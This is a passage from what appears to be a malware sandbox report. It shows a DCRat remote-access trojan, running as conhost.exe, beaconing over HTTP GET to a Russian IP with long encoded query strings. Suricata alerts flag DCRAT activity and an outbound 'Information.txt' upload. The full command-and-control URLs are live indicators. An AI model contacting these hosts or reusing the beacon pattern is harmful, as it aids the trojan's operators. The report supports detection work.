VzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiImFDMzIWN5kzN5I2M3UDZxMjNmVGZ1MzM1MTMldjYygTN1IGMmNTYmJiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=d1nILBTQNJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIhJWMiZDMjNzY4cTMllDNilTNwMmZhdDNwIGZ5czN4IjZ0YDNyI2Y0IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W&8851c6d4460ca6de87f4d19182d5eacf=QX9JiI6ISYmNzY4ITZ1QDM3MGNwMjMwUTZyIWY2MDN2EmM1ETOhJCLiEmYxImNwM2MjhzNxUWO0IWO1AzYmF2N0AjYklzN3gjMmRjN0IjYjRjI6IiMjZDO5UjN3MTOxQjMxIWY0QWYkFjNwUWZ4ITN3MDNyICLiEzM5MWYiVjNyMmMkV2N1EjNxYjNhVGM1YzM2UDNkFGO4gDM3Y2YmVjI6IyYxM2N2UGO1YWMiljY3gDOwgjYkF2Y3QTZ2YDNmVWNlJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2a510Zj1mYwJESjxmUzU1ZRR1Tnd3VatWOXR1ZZRUS1g3VhRnRtJ1ZRpmT0g2QJZDawI1djpGT5F0QRdWVGVFRCNUT3FlaORXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWS4lUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0IjYrVjMi1UOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUawIjYrRWbiBHdFl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETp1EVPdHND1Ed3NkTyUEVOVXRU5UavpWSqlzRil2dpl0QktWS2k0UllnUuJWM5ITWpdXaJtWNXl1ck1mYGpUaPlGNyIGckdlW5p0QMlGNyI2a1IjYNpUaPl2aIRGcO1WSzl0QNRTRqxUMNRVT1lEVNlHND9ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiImFDMzIWN5kzN5I2M3UDZxMjNmVGZ1MzM1MTMldjYygTN1IGMmNTYmJiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&8851c6d4460ca6de87f4d19182d5eacf=0VfiIiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIjJzYyU2N2ITMwATZ4kjN3ATMzAzY0EmN1EjNhRjYyMTNwQWZ2ADO3IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3140 | conhost.exe | 62.113.96.135:80 | — | Zenon N.S.P. | RU | malicious |
— | — | 192.168.100.2:53 | — | — | — | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3140 | conhost.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
3140 | conhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |